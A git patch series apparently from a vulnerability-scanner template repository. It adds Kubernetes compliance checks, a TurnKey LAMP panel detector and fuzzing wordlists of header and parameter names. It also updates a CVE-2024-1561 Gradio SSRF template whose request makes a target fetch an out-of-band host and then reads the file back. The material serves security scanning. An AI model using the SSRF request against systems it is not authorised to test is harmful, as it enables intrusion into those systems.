\ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml new file mode 100644 index 0000000000..e0a05ee92e --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml @@ -0,0 +1,39 @@ +id: k8s-etcd-cafile-set + +info: + name: Ensure etcd-cafile argument set + author: princechaddha + severity: medium + description: Checks if the etcd-cafile argument is properly set in the etcd configuration, crucial for secure client connections to etcd. + impact: | + Without specifying the etcd-cafile argument, etcd might not establish secure and authenticated connections, leading to potential security breaches. + remediation: | + Configure etcd to use an etcd-cafile argument that points to a valid CA certificate bundle. This setting should be part of the etcd startup arguments or in its configuration file. + reference: + - https://etcd.io/docs/v3.5/op-guide/security/ + tags: cloud,devops,kubernetes,security,devsecops,etcd + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=etcd -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'etcd' + + - type: word + words: + - "etcd-cafile" + negative: true + + extractors: + - type: dsl + dsl: + - "Etcd configuration is missing the etcd-cafile argument." +# digest: 490a004630440220707289eec6b2f08d1bc88620d1d58ff41c2f661a0956d079441ee324f9ae7591022003d8bd244a842d8ba73ac829f52bb4790ab780328b5f42299d826d12d5728039:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml new file mode 100644 index 0000000000..342f97c575 --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml @@ -0,0 +1,39 @@ +id: k8s-etcd-files-set + +info: + name: Ensure etcd cert and key set + author: princechaddha + severity: medium + description: Checks if the etcd-certfile and etcd-keyfile arguments are properly set in the etcd server configuration, crucial for secure communication. + impact: | + If the etcd-certfile and etcd-keyfile arguments are not set, the etcd server might not encrypt its communications, potentially allowing unauthorized access to sensitive data. + remediation: | + Configure the etcd server to use etcd-certfile and etcd-keyfile arguments that point to valid certificate and key files respectively. This ensures that communications to and from the etcd server are properly encrypted. + reference: + - https://etcd.io/docs/v3.4.0/op-guide/security/ + tags: cloud,devops,kubernetes,security,devsecops,etcd + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=etcd -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'etcd' + + - type: word + words: + - "etcd-certfile" + - "etcd-keyfile" + negative: true + + extractors: + - type: dsl + dsl: + - "etcd server configuration is missing the etcd-certfile or etcd-keyfile arguments." diff --git a/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml new file mode 100644 index 0000000000..64f7d6a04b --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml @@ -0,0 +1,40 @@ +id: k8s-ns-usage-check + +info: + name: Ensure namespaces are utilized + author: princechaddha + severity: info + description: Checks if Kubernetes namespaces are actively used to separate resources, which is critical for resource organization and access control. + impact: | + Lack of namespaces usage can lead to disorganized resources and potentially flawed access controls, impacting security and management. + remediation: | + Implement and use namespaces to organize resources within the Kubernetes cluster effectively. Define access controls and resource quotas on a per-namespace basis. + reference: + - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/ + tags: cloud,devops,kubernetes,security,devsecops,namespaces + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get namespaces --output=json + + matchers-condition: and + matchers: + - type: word + words: + - '"items":' + + - type: word + words: + - '"Namespace"' + negative: true + + extractors: + - type: dsl + dsl: + - "Kubernetes cluster is not utilizing namespaces." + +# digest: 4b0a00483046022100a4752be32718d5e3bf67d19c2 diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml new file mode 100644 index 0000000000..823bcf2729 --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml @@ -0,0 +1,38 @@ +id: k8s-svc-acct-issuer-set + +info: + name: Checks if service-account-issuer is correctly configured + author: princechaddha + severity: medium + description: Checks if the service-account-issuer argument is correctly configured in the API server, critical for issuing valid service tokens. + impact: | + If the service-account-issuer argument is not set, the API server may issue tokens that are not accepted by other services, leading to authentication failures. + remediation: | + Set the service-account-issuer argument to a valid issuer URL in the API server's startup arguments or configuration file. This ensures the tokens issued are trusted across services. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/ + tags: cloud,devops,kubernetes,security,devsecops,api-server + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + + - type: word + words: + - "service-account-issuer" + negative: true + + extractors: + - type: dsl + dsl: + - "API server configuration lacks the service-account-issuer argument." \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml new file mode 100644 index 0000000000..3c48a6ed5f --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml @@ -0,0 +1,40 @@ +id: k8s-svc-acct-key + +info: + name: Ensure service-account-key-file set + author: princechaddha + severity: medium + description: Checks if the service-account-key-file argument is properly set in the API server configuration, which is critical for validating service account tokens. + impact: | + The absence of the service-account-key-file argument means that the API server might not perform robust authentication checks for service accounts, potentially allowing unauthorized access. + remediation: | + Configure the API server to use a service-account-key-file that points to a valid private key used to sign service account tokens. This setting should be part of the API server startup arguments or in its configuration file. + reference: + - https://kubernetes.io/docs/admin/kube-apiserver/ + tags: cloud,devops,kubernetes,security,devsecops,api-server + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + + - type: word + words: + - "service-account-key-file" + negative: true + + extractors: + - type: dsl + dsl: + - "API server configuration is missing the service-account-key-file argument." + +# digest: 4a0a00473045022100e3dc33fefeeb5d3b9a9af3d43e89b7b7c97c50aa77b344d7e976f9340e22e7450220159e8da06b7ceb82c532bd1caeeeffba7c237c568a57988f1ada334a7c09fa83:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml new file mode 100644 index 0000000000..049615a486 --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml @@ -0,0 +1,38 @@ +id: k8s-svc-acct-lookup-set + +info: + name: Ensure service-account-lookup set + author: princechaddha + severity: medium + description: Checks if the service-account-lookup argument is set to true in the API server configuration, which is essential for verifying service accounts against the stored secrets. + impact: | + Without the service-account-lookup argument set to true, the API server may not verify service accounts against stored secrets, potentially allowing unauthorized access. + remediation: | + Set the service-account-lookup argument to true in the API server's startup arguments or configuration file to ensure proper verification of service accounts. + reference: + - https://kubernetes.io/docs/admin/kube-apiserver/ + tags: cloud,devops,kubernetes,security,devsecops,api-server + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + + - type: word + words: + - "service-account-lookup=true" + negative: true + + extractors: + - type: dsl + dsl: + - "API server configuration is missing the 'service-account-lookup=true' argument." diff --git a/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml new file mode 100644 index 0000000000..8c982f216a --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml @@ -0,0 +1,41 @@ +id: k8s-tls-config-set + +info: + name: Ensure TLS config appropriately set + author: princechaddha + severity: medium + description: Checks if the tls-cert-file and tls-private-key-file arguments are properly set in the API server configuration, which is essential for secure communication. + impact: | + The absence of tls-cert-file and tls-private-key-file arguments means that the API server may not use TLS for secure communications, leading to potential security risks. + remediation: | + Configure the API server to use tls-cert-file and tls-private-key-file that point to a valid certificate and key file respectively. This setting should be part of the API server startup arguments or in its configuration file. + reference: + - https://kubernetes.io/docs/admin/kube-apiserver/ + tags: cloud,devops,kubernetes,security,devsecops,api-server + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + + - type: word + words: + - "tls-cert-file" + - "tls-private-key-file" + negative: true + + extractors: + - type: dsl + dsl: + - "API server configuration is missing the tls-cert-file or tls-private-key-file argument." + +# digest: 4a0a00473045022100e3dc33fefeeb5d3b9a9af3d43e89b7b7c97c50aa77b344d7e976f9340e22e7450220159e8da06b7ceb82c532bd1caeeeffba7c237c568a57988f1ada334a7c09fa83:366f2a24c8eb519f6968bd8801c08ebe From 5adb4dd240a600fe74c6254bf4052228661892a1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 11:56:13 +0530 Subject: [PATCH 0246/1841] Create turnkey-lamp-panel.yaml --- http/exposed-panels/turnkey-lamp-panel.yaml | 32 +++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/exposed-panels/turnkey-lamp-panel.yaml diff --git a/http/exposed-panels/turnkey-lamp-panel.yaml b/http/exposed-panels/turnkey-lamp-panel.yaml new file mode 100644 index 0000000000..6400d34bc0 --- /dev/null +++ b/http/exposed-panels/turnkey-lamp-panel.yaml @@ -0,0 +1,32 @@ +id: turnkey-lamp-panel + +info: + name: TurnKey LAMP Panel - Detect + author: ritikchaddha + severity: info + description: | + TurnKey LAMP Control Panel was detected. + reference: + - https://www.turnkeylinux.org/lamp + metadata: + max-request: 1 + verified: true + shodan-query: title:"TurnKey LAMP" + fofa-query: title="TurnKey LAMP" + tags: panel,login,turnkey,lamp,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TurnKey LAMP" + + - type: status + status: + - 200 From ff289f11b1744b733fed13fd2405de5b93769211 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jun 2024 12:16:12 +0530 Subject: [PATCH 0247/1841] updated matcher & payload --- http/cves/2024/CVE-2024-1561-3x-ssrf.yaml | 36 +++++------------------ 1 file changed, 8 insertions(+), 28 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml b/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml index 0a50b5edcf..c37d776ff8 100644 --- a/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml +++ b/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml @@ -1,7 +1,7 @@ id: CVE-2024-1561-3x-ssrf info: - name: Gradio 3.47 - 3.50.2 - Server Side Request Forgery + name: Gradio 3.47 - 3.50.2 - Server-Side Request Forgery author: nvn1729 severity: high description: | @@ -26,7 +26,7 @@ http: Host: {{Hostname}} Content-Type: application/json - {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"} + {"component_id": "{{fuzz_component_id}}", "data": "http://oast.me", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"} - | GET /file={{download_path}} HTTP/1.1 @@ -36,41 +36,21 @@ http: - type: regex part: body name: download_path - internal: true group: 1 regex: - "\"?([^\"]+)" + internal: true payloads: - fuzz_component_id: - - 1 - - 2 - - 3 - - 4 - - 5 - - 6 - - 7 - - 8 - - 9 - - 10 - - 11 - - 12 - - 13 - - 14 - - 15 - - 16 - - 17 - - 18 - - 19 - - 20 + fuzz_component_id: helpers/wordlists/numbers.txt stop-at-first-match: true matchers-condition: and matchers: - - type: regex - part: body - regex: - - [a-z0-9]+ + - type: word + part: body_2 + words: + - "

Interactsh Server

" - type: status status: From e90afe04ed821ac55620f9c2f99e4c3a3dac8158 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 16 Jun 2024 09:28:40 +0200 Subject: [PATCH 0248/1841] Update headers.txt --- helpers/wordlists/headers.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/helpers/wordlists/headers.txt b/helpers/wordlists/headers.txt index ccbbe32b85..ea2e2e06ed 100644 --- a/helpers/wordlists/headers.txt +++ b/helpers/wordlists/headers.txt @@ -1964,6 +1964,8 @@ x-from X-Fruit X-Fully-Authenticated X-Furcadia-Allow-Caching +x-functions-key +x-functions-clientid x-fv X-Galleries X-Gallery-Type @@ -2914,4 +2916,4 @@ ZOOPLUS_ORIGINAL_COMPLETE_URL zotero-api-version zotero-write-token ZRL_CMP -ZXY \ No newline at end of file +ZXY From bcfae01554121035c5754a349a38128cbc8f7319 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 16 Jun 2024 09:55:33 +0200 Subject: [PATCH 0249/1841] Add files via upload --- helpers/wordlists/params.txt | 97824 +++++++++++++++++++++++++++++++++ 1 file changed, 97824 insertions(+) create mode 100644 helpers/wordlists/params.txt diff --git a/helpers/wordlists/params.txt b/helpers/wordlists/params.txt new file mode 100644 index 0000000000..314ed4c4ab --- /dev/null +++ b/helpers/wordlists/params.txt @@ -0,0 +1,97824 @@ +a +a-ap +a-color +a-dnt +a-mute +a-ssid +a_aid +a_bid +a_block +a_bogus +a_c +a_campaign +a_cc +a_class +a_clid +a_color +a_content +a_d +a_dlv_err +a_ea +a_editor +a_en +a_fac +a_fid +a_g +a_href +a_i +a_id +a_idx +a_image +a_impression +a_key +a_lat +a_level +a_lid +a_lng +a_m +a_max +a_media +a_medium +a_n +a_nt +a_num +a_partner_ids +a_php +a_pos +a_publisher +a_q +a_rc +a_rid +a_s +a_section +a_size +a_source +a_t +a_tablename +a_text +a_tk +a_token +a_tp +a_type +a_v +aa +aa_c +aa_id +aa_uuid +aaa +aaaa +aaaa-mm-dd +aaaaa +aaaaaa +aaaid +aab +aabd +aabs +aac +aaccepted +aaction +aactive +aad +aadredir +aadvid +aaf +aafaid +aaff +aafs +aai +aai_browser +aai_hash +aai_os +aaid +aak +aal +aam +aam_id +aam_media +aam_uuid +aamb +aamidcto +aamlh +aanb +aanbieder +aanschafwaarde +aantal +aantaldagen +aantalitems +aantalregels +aaoj +aap_v +aapaaaassssasdasdasaaaaapa +aaplbd +aaqtzb +aar +aardvark_departmentid +aardvark_domain +aardvark_footprint +aardvark_live +aardvark_page +aardvark_refurl +aardvark_time +aardvark_useragent +aas +aasd +aass +aass_clid_tg +aat +aatm +aauid +aauto +aaver +aax_id +aayxkj +aazer +ab +ab_block +ab_channel +ab_cookie +ab_error +ab_experiments +ab_groups +ab_name +ab_s +ab_segment +ab_t +ab_test +ab_test_group +ab_test_id +ab_test_url +ab_testing +ab_testing_id +ab_token +ab_v +ab_variants +ab_variation +ab_variation_ids +aba +abandon +abandona +abb +abbb +abbbbby +abbbbfdsfdfdsfby +abbbfdafdsafsfdbbfdsafsbykorraaaaa +abbp +abbr +abbrev +abbreviation +abbreviation__eq +abbreviations +abbrevs +abbs +abbsdfdsafssfdsffdsffadfyy +abbu +abc +abcd +abcde +abcdef +abcid +abcm +abcpversion +abd +abd_is_home_page +abd_post_id +abd_si_opt +abdbg +abdl +abe +abertura +abf +abfrage +abfyid +abg +abgas +abgroup +abgtt +abh +abi +abi-lipscore +abi-model-selector +abia +abid +ability_token +abip +abj +abk +abkbwe +abkpkk +abl +abl_version +ablist +ablk +abm +abmvc +abn +abnaqy +abo +abort +abortable +about +about_id +about_section_bg +aboutads_sess +above_stars +abp +abpl +abpos +abpr +abr +abr_id +abr_pts +abranch +abre +abrir_nova_janela +abriviature +abroad +abs +abs_age +abs_code +abs_img_path +abs_path +abs_speed +abscfcdsc +abschl_key +absent +absolute +absolute-url-enabled +absolute_timestamp +absolute_uri +absolute_urls +absolutex +absolutey +abspth +abst +abstract +abt +abt_opts +abtag +abte +abteilung +abtest +abtest_image +abtest_status +abtest_title +abtestid +abtesting_id +abtesturl +abtf-proxy +abtg +abtht +abtk +abtm +abtp +abtst +abtv +abtyd +abtype +abuid +abuoak +abv +abvar +abver +abw +abwl +abxe +aby +abz +abzcid +ac +ac_action +ac_clientid +ac_clip +ac_contactid +ac_conv_label +ac_id +ac_lang +ac_log_alias +ac_number +ac_os +ac_page +ac_redirect +ac_referer +ac_report_time +ac_source +ac_t +ac_tld +ac_ua +ac_url +ac_v +aca +acache +academic_level +academic_lvl +academic_year +academicyearid +academy +academy_id +acaf +acafcemail +acafcf +acafcres +acafcrmid +acafctype +acafextflag +acafname +acafprodstring +acafsdesc +acafspecialaflag +acafsurname +acaftkt +acaftleft +acafuid +acafwcode +acafwdesc +acao +acao_id +acapacity +acate +acb +acbc +acbqof +acc +acc-id +acc_code +acc_get_force +acc_id +acc_level +acc_sub +acc_video_id +accam +accao +accd +accdn +accel +accelerometer +accent +accent-color +accent-font +accent-font-name +accent-font-url +accent_color +accent_text_color +accentcolor +accept +accept-language +accept_background +accept_chats +accept_color +accept_cookies +accept_lang +accept_language +accept_radius +accept_sources +accept_text +acceptable +accepted +accepted_data_theme_id +accepted_in_days +acceptedprivacyconditions +acceptlanguage +acceptpms +acces +accesrapide +accesrapideactif +access +access-key +access-token +access_case +access_code +access_count +access_denied +access_denied_level +access_domain +access_id +access_key +access_key_id +access_level +access_log_id +access_mode +access_mode_id +access_page +access_time +access_token +access_token_fb +access_token_ttl +access_token_type +access_type +access_url +access_without_login +accesscheck +accesscode +accessdenied +accessibility +accessibility_unit__type +accessible +accessid +accession +accesskey +accesslevel +accessmethod +accessories +accessory +accessory_code +accessory_group +accesstime +accesstoken +accesstokensecret +acci +accid +accidt +accio +accion +accion_principal +accmd +accnt +acco_css +accol +accom_id +accommodatie +accommodatiegroep +accommodation +accommodation-type +accommodation_id +accommodation_kind_uuid +accommodation_type +accommodation_types +accommodations +accomodation_action +accordion +accorregister +account +account-id +account_author +account_channel +account_domain +account_final_version +account_group_in +account_hash +account_id +account_ids +account_key +account_local_id +account_name +account_number +account_pro +account_sdk_source +account_slug +account_status +account_subdomain +account_token +account_type +account_type_id +account_uid +account_uuid +accountcrmid +accountheader +accountid +accounting_courses +accountkey +accountname +accountnumber +accounts +accounts_shop_id +accounttype +accreditation +accroche +accrual_type_id +acct +acct_codename +acct_id +acct_name +acctid +accttype +acctype +accu +accueil +accumulated +accumulatedrecordcount +accumulator +accuracy +accver +accwd +acd +acdc +acdm_nm +acdv +ace +ace-font +ace_name +aceauth +acec +aceplanet +acesso +acessorio +acf +acf_callback +acf_content +acf_format +acfc +acfcomp +acflg +acg +ach +ach_ancien +ach_neuf +ach_oxygene +ach_viag +ach_visite +achieve +achievement +aci +acid +ack +ackqueue +acl +aclid +aclink_c +aclink_idk +aclink_site +aclinkidk +aclk +acloca +acm +acmb +acme +acmp +acmsession +acn +acncd +acno +acnt +acntid +acnum +acod +acode +acodec +acol +acolor +acomnr +acontrols +acookie +acount +acp +acpage +acpos +acps +acpt_lang +acq +acqnm +acr +acr_values +acreage +acreen +acres +acres_min +acrid +acronym +acronyme +across +acs +acs_random_token +acsid +acsn +act +act_as +act_bg +act_id +act_lp +act_month +act_name +act_page_id +act_rf +act_sche +act_sess +act_su +act_type +actartid +actbg +actblock +actcatid +actcode +actconloadid +actcontrol +acti +actid +actids +actie +actief +actif +actime +actimgts +actinfo +action +action-id +action-labels +action-name +action-text +action-type +action_api_product +action_attributes +action_attributes_num +action_attributes_str +action_by +action_cable +action_card +action_category +action_code +action_color +action_context +action_cpv +action_digest +action_dt_stt +action_flag +action_get_list +action_get_templist +action_group_id +action_group_key +action_id +action_kisei +action_language +action_login +action_look +action_mode +action_name +action_param +action_pass +action_request +action_result +action_route +action_shop +action_shop_param +action_source +action_start +action_time +action_title +action_tracker_id +action_type +action_type_id +action_useragent +actionadd +actionajax +actioncode +actionfile +actionfolder +actionid +actionname +actions +actions-pos +actionscript +actiontype +actionvalue +activ +activa +activate +activate-multi +activate_click_scroll +activate_counter +activate_mouse_scroll +activated +activating_segments +activation +activation_date +activation_key +activator +active +active-color +active-plugins +active-urls +active_adblocker +active_ai +active_btn +active_btn_bg_color +active_company_id +active_config +active_cookiebar +active_current +active_day +active_first +active_flg +active_holiday +active_index +active_lang +active_locale +active_model_id +active_on_banner +active_only +active_panel +active_popover +active_product +active_section +active_server +active_staff_only +active_status +active_tab +active_tagcommander +active_view +active_win +activedate +activedemand_session_guid +activeevents +activeid +activeonly +actives +activestatus +activetab +actividad +activiteit +activities +activity +activity-code +activity-sector +activity__in +activity_code +activity_consumerid +activity_days +activity_id +activity_ids +activity_legacyid +activity_length +activity_list +activity_site +activity_size +activity_table_id +activity_type +activity_uuid +activityid +activitytype +activityvalues +activkey +activo +activos +actltime +actmode +actn +actno +actor +actor_id +actorid +actors +actors-id +actp +actpass +actreject +actrt +actsutaho +acttab +acttype +actual +actual-format +actual-name +actual-user +actual_currency +actual_page +actual_planning +actual_size +actual_time +actual_url +actualitesinterne_image +actualizacion +actualsize +actualtypes +actv +actype +acu +acu-uid +acuityads_uid +acv +acvw +acw +acwtime +acxhed +acyformname +acze +ad +ad-adv +ad-demand-source +ad-density +ad-form-target +ad-group +ad-pix +ad-placement +ad-pod-id +ad-sense +ad-session-id +ad-spot +ad-tag-video-id +ad_ +ad_analytics_id +ad_autoplay +ad_banner +ad_bidder +ad_block +ad_blocker +ad_blocks +ad_box_ +ad_box_id +ad_brect_wohome_c +ad_butler_pid +ad_calls +ad_cat +ad_category +ad_channel +ad_cid +ad_class +ad_classid +ad_click +ad_click_id_org +ad_cnt +ad_code +ad_con +ad_config_id +ad_correlation_id +ad_count +ad_data +ad_dist +ad_durl_color +ad_dz +ad_enabled +ad_error +ad_error_code +ad_event_type +ad_evt +ad_featured +ad_format +ad_format_ids +ad_group +ad_group_id +ad_group_type +ad_guid +ad_h +ad_height +ad_html +ad_id +ad_identifier +ad_ids +ad_img_url +ad_imp_id +ad_impressions +ad_index +ad_key +ad_keyword +ad_len +ad_limit +ad_lng +ad_load_time +ad_loc +ad_locationpic +ad_log +ad_mcat +ad_medium +ad_mt +ad_mute +ad_name +ad_network_ +ad_nm +ad_no +ad_num +ad_number +ad_oper +ad_owner +ad_page +ad_param +ad_params +ad_partner +ad_place +ad_pos +ad_position +ad_product +ad_product_layout +ad_product_name +ad_referrer +ad_refresh_count +ad_report_id +ad_request_id +ad_reserved +ad_revenue +ad_rule +ad_selection +ad_show +ad_size +ad_slot +ad_slot_id +ad_source +ad_source_id +ad_space +ad_spot_no +ad_status +ad_storage +ad_sub +ad_sys +ad_sz_rl +ad_tag +ad_tags +ad_target +ad_text_color +ad_theme +ad_time +ad_title_color +ad_tp +ad_trigger +ad_trigger_method +ad_type +ad_type_ +ad_type_code +ad_types +ad_unit +ad_unit_code +ad_unit_id +ad_unit_tag_id +ad_unit_type +ad_url +ad_url_color +ad_user_data +ad_uuid +ad_v +ad_visibility +ad_volume +ad_vuz_id +ad_vuz_pos +ad_w +ad_width +ad_wt +ad_wxh +ad_y +ad_zone +ad_zones +ada +ada-contrast-ratio +ada-page-path +ada-token +ada-type +ada_request_origin +adad +adahargacoret +adap +adapt +adapt_id +adapter +adapters +adapterver +adaptive +adaptive-height +adaptive_stream +adaptive_token +adaptiveend +adaptivestart +adaptor +adarea +adas +adata +adate +adati +adatum +adavoq +adb +adb_cm +adb_ex +adb_flag +adb_ld +adbah +adbannerid +adbcid +adbd +adbh +adbhsx +adbid +adbj +adbju +adbl +adblck +adblk +adblock +adblocked +adblocker +adbn +adboxtype +adbraud +adbskey +adbv +adbw +adbx +adby +adc +adcamp +adcat +adcd +adce +adcentric +adcfg +adcfg_response +adcgfd +adch +adchi +adcid +adclass +adclick +adclient +adclose +adcode +adcode_count +adcols +adcontext +adcount +adcreative_id +adcref +adcrid +add +add-inv +add-is-advertised +add-marker +add-placeholder-ws +add-to-cart +add_agent_link +add_another_room +add_background +add_block_flag +add_child +add_child_ok +add_cities +add_code +add_color +add_community_urls +add_css +add_days_or_hours +add_fields +add_groups +add_headers +add_info +add_links +add_locale_top +add_now_time +add_pic +add_res +add_style +add_to_url +add_tracking_info +add_url +add_vers +addacc +addbgcolor +addborder +addbutton +addcat +addcategory +addcd +addclick +addcls +addcomment +addcontent +adddividers +added +added_at_order +added_to_home_page +addelids +addelivery +addelivery_response +addevent +addeviceid +addfcolor +addfile +addfolder +addgroup +addid +addiframe +addinfo +adding +addit +addit_ext +addition +additional +additional_ajax +additional_attr +additional_color +additional_css +additional_css_file +additional_fields +additional_filters_kev +additional_flags +additional_info +additional_marker +additional_notes +additional_notes_l +additional_notes_r +additional_notes_w +additional_query +additional_sort_fields +additional_stores +additional_types +additionalicons +additionally +additionalsections +additions +addlayer +addlocation +addlogo +addmeta +addmobile +addmsgchateconeto +addnew +addnull +addomain +addon +addon_id +addonkey +addonname +addons +addons_js +addons_total +addpic +addpool +addport +addr +addr_do_nm +addr_dong_nm +addr_li_nm +addr_si_nm +addrcountry +address +address_bar +address_class +address_color +address_ex +address_hover_color +address_id +address_locality_fi +address_only +address_required +address_search +address_service_id +address_type +address_val +addressdetails +addresses +addressid +addressinput +addressren +addrno +addrule +addsalarytype +addseg +addsite +addstyles +addsubcategories +addtag +addtext +addthis_plugin_info +addtl_consent +addtocartstring +addtocarttext +addtohomescreen +addtxt +addtype +addurl +adduser +addusers +addvisit +addweeks +addwishlistdiv +addworktype +addy-code +addy-type +ade +adesc +adet +adet-sec +adet-turu +adex_consent +adex_consent_hash +adex_consent_origin +adexid +adext +adf +adf_id +adf_refresh +adfa +adfaction +adfid +adfilterid +adfirst +adflag +adflashid +adflight +adfmt +adform_pc +adform_pid +adform_uid +adform_v +adformat +adfox +adfox_ +adfox_pk +adfox_value +adfserve +adfuid +adfusr +adg +adg_mts +adg_tag_async +adgext_criteo_id +adgext_imuid +adgjsv +adgroup +adgroup_variant_ids +adgroupid +adgrp +adguid +adh +adh_id +adheight +adherent_code +adhesion +adhgt +adhost +adi +adict +adid +adid_use +adidlist +adids +adinf +adir +aditional +adiu +adj +adjective +adjoininglayer +adjsver +adjust +adjust-prices +adjust_data +adjust_for_cart_floor +adjust_range +adjustcrop +adjusted +adjustment +adk +adkey +adkind +adks +adkuid +adl +adl_partner_id +adlay_tst +adlbl +adldjdaw +adlib +adlist +adlmem +adloc +adlocation +adloox_io +adloox_transaction_id +adlr +adlt +adm +adm_method +adm_secure +admanagerzoneid +admarker +admb_iid +admb_rid +admedia_alias +admeld_ +admid +admin +admin_cache_hash +admin_dsp +admin_id +admin_level +admin_mode +admin_path +admin_property_types +admin_status +admin_url +admin_user +admincompanyid +adminemail +adminid +adminlogin +adminlte +adminmail +adminname +adminpass +adminpassword +adminpwd +admins +admintags +adminuser +adminwidgets +admission_id +admissions +admitad_uid +admja +admutems +admvad +adn +adn_uid +adname +adnc +adnet +adnetwork +adnid +adnum +adnv +adnxs_id +adnxs_uid +adobe_analytics_fid +adobe_analytics_rsid +adobe_evar +adobe_mc +adobe_mc_ref +adobe_mc_sdid +adobe_mcid +adobe_obj +adobe_report_suite +adobeid +adobmu +adom +adomain +adop +adop-zone +adopt +adown +adp +adp_line_name +adp_sessionid +adpage +adpageurl +adpartner +adpds_flash +adpds_frame +adpds_nocache +adpds_ref +adpds_site +adph +adpid +adplat +adplt +adpoint +adpos +adposcount +adposition +adpr +adpresentations +adprodset +adprovider +adps +adpt +adr +adr_id +adra +adre +adref +adren +adrep +adres +adresa +adresar +adress +adresse +adriver +adrm +adrn +adroll_adv_id +adroll_currency +adroll_external_data +adroll_fpc +adroll_pix_id +adroll_product_action +adroll_product_group +adroll_product_id +adroll_products +adroll_s_ref +adroll_version +adrows +adrp +adrs +adrt +adrv +ads +ads_blocked +ads_click_id +ads_cookies +ads_count +ads_counter +ads_disabled +ads_enabled +ads_failure_total +ads_fetch_total +ads_format +ads_gg +ads_id +ads_offset +ads_order +ads_out +ads_params +ads_placement +ads_position +ads_refresh_total +ads_size +ads_slot_top_total +ads_tracking +ads_txt_id +ads_x +ads_y +adsabzcid +adsafe +adsafe_jsinfo +adsafe_par +adsafe_pb +adsafe_preview +adsafe_type +adsafe_url +adsanalyticsblocked +adsas +adsb +adsbsat +adsbygoogle +adscale_token +adscategory_id +adsciencetime +adsdata +adsdeli +adsdf +adsdk-bundle-name +adsdk-bundle-version +adsdk-test-tag +adsense +adsense_type +adsenv +adseq +adserv +adservadslot +adserver +adserver_id +adservicename +adservname +adset +adshow +adshowtype +adsid +adsite +adsize +adsjs +adskey +adskippblems +adslot +adslotid +adslots +adsnum +adsok +adsop +adsort +adsource +adsourceid +adsp +adspace +adspcid +adspot +adspot_ +adspot_id +adspreset_id +adsr +adsrc +adsrv +adsrv_adu_exp +adsrv_advrt_id +adsrv_att_delta +adsrv_cmpgn_id +adsrv_crea_id +adsrv_empty +adsrv_lnitem_id +adsrv_size +adsrv_vsbl +adsrv_vsbl_ts +adsshown +adst +adstanding_id +adstir_media_uid +adstir_optout +adstra +adstrade +adstring +adstyle +adstype +adsunit +adsver +adsync +adsys_capping +adszs +adt +adt-uid +adtag +adtag_version +adtagid +adtagurl +adtarget +adtech_uid +adtech_uid_scope +adtechplacementid +adtest 